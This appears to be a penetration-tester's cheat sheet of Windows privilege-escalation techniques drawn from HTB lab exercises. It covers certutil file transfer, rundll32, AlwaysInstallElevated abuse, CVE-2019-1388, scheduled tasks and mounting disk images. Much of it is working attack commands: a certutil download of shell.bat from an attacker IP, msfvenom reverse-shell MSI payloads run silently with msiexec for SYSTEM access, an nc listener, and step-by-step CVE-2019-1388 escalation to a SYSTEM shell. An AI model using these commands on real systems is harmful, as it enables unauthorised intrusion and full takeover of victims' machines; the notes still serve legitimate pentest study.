# Miscellaneous Techniques ## Living Off The Land Binaries and Scripts (LOLBAS) {% embed url="" %} ### **Certutil** #### Transfer Files ```powershell-session PS C:\htb> certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat ``` #### Encode File ```cmd-session C:\htb> certutil -encode file1 encodedfile Input Length = 7 Output Length = 70 CertUtil: -encode command completed successfully ``` #### Decode File ```cmd-session C:\htb> certutil -decode encodedfile file2 Input Length = 70 Output Length = 7 CertUtil: -decode command completed successfully. ``` ### Rundll32 A binary such as [rundll32.exe](https://lolbas-project.github.io/lolbas/Binaries/Rundll32/) can be used to execute a DLL file. We could use this to obtain a reverse shell by executing a .DLL file that we either download onto the remote host or host ourselves on an SMB share. ## Always Install Elevated {% content-ref url="citrix-breakout" %} [citrix-breakout](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/citrix-breakout) {% endcontent-ref %} ```powershell-session PS C:\htb> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 ``` ```powershell-session S C:\htb> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 ``` ```shell-session msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi ``` ```cmd-session C:\htb> msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart ``` ``` nc -nlvp 9443 ``` ### PowerUp ``` PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1 PS C:\Users\pmorgan\Desktop> Write-UserAddMSI Output Path ----------- UserAdd.msi ``` ### Registry - AlwaysInstallElevated 1. Query the **registry for AlwaysInstallElevated** keys: `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`\ `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`Note that both **keys are set to 1 (0x1).** 2. On Kali, generate a **reverse shell Windows Installer (reverse.msi)** using msfvenom. Update the LHOST IP address accordingly: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi` 3. Transfer the reverse.msi file to the C:\PrivEsc directory on Windows 4. Start a listener on Kali and then **run the installer** to trigger a reverse shell running with SYSTEM privileges: `msiexec /quiet /qn /i C:\PrivEsc\reverse.msi` ## CVE-2019-1388 Vulnerable Windows Server and Workstation versions. ``` SERVER ====== Windows 2008r2 7601 ** link OPENED AS SYSTEM ** Windows 2012r2 9600 ** link OPENED AS SYSTEM ** Windows 2016 14393 ** link OPENED AS SYSTEM ** Windows 2019 17763 link NOT opened WORKSTATION =========== Windows 7 SP1 7601 ** link OPENED AS SYSTEM ** Windows 8 9200 ** link OPENED AS SYSTEM ** Windows 8.1 9600 ** link OPENED AS SYSTEM ** Windows 10 1511 10240 ** link OPENED AS SYSTEM ** Windows 10 1607 14393 ** link OPENED AS SYSTEM ** Windows 10 1703 15063 link NOT opened Windows 10 1709 16299 link NOT opened ... ``` {% embed url="" %} Right click on the `hhupd.exe` executable and select `Run as administrator` from the menu.

Click on `Show information about the publisher's certificate` to open the certificate dialog. Here we can see that the `SpcSpAgencyInfo` field is populated in the Details tab.

Click on the hyperlink and then click `OK`, and the certificate dialog will close, and a browser window will launch

The browser instance was launched as SYSTEM. Right-click anywhere on the web page and choose `View page source`. Once the page source opens in another tab, right-click again and select `Save as`, and a `Save As` dialog box will open.

Type `c:\windows\system32\cmd.exe` in the file path and hit enter. If all goes to plan, we will have a cmd.exe instance running as SYSTEM.

## Scheduled Tasks {% embed url="" %} ``` C:\htb> schtasks /query /fo LIST /v ``` ```powershell-session PS C:\htb> Get-ScheduledTask | select TaskName,State TaskName State -------- ----- .NET Framework NGEN v4.0.30319 Ready .NET Framework NGEN v4.0.30319 64 Ready .NET Framework NGEN v4.0.30319 64 Critical Disabled .NET Framework NGEN v4.0.30319 Critical Disabled AD RMS Rights Policy Template Management (Automated) Disabled AD RMS Rights Policy Template Management (Manual) Ready PolicyConverter Disabled SmartScreenSpecific Ready VerifiedPublisherCertStoreCheck Disabled Microsoft Compatibility Appraiser Ready ProgramDataUpdater Ready StartupAppTask Ready appuriverifierdaily Ready appuriverifierinstall Ready CleanupTemporaryState Ready DsSvcCleanup Ready Pre-staged app cleanup Disabled ``` ## **Checking Permissions on C:\Scripts Directory** ```cmd-session C:\htb> .\accesschk64.exe /accepteula -s -d C:\Scripts\ Accesschk v6.13 - Reports effective permissions for securable objects Copyright ⌐ 2006-2020 Mark Russinovich Sysinternals - www.sysinternals.com C:\Scripts RW BUILTIN\Users RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators ``` ## User/Computer Description Field ```powershell-session PS C:\htb> Get-LocalUser Name Enabled Description ---- ------- ----------- Administrator True Built-in account for administering the computer/domain DefaultAccount False A user account managed by the system. Guest False Built-in account for guest access to the computer/domain helpdesk True htb-student True htb-student_adm True jordan True logger True sarah True sccm_svc True secsvc True Network scanner - do not change password sql_dev True ``` **Computer Description Field** ```powershell-session PS C:\htb> Get-WmiObject -Class Win32_OperatingSystem | select Description Description ----------- The most vulnerable box ever! ``` ## Mount VHDX/VMDK `.vhd`, `.vhdx`, and `.vmdk` files ### **Mount VMDK on Linux** ```shell-session guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk ``` ### **Mount VHD/VHDX on Linux** ```shell-session guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1 ```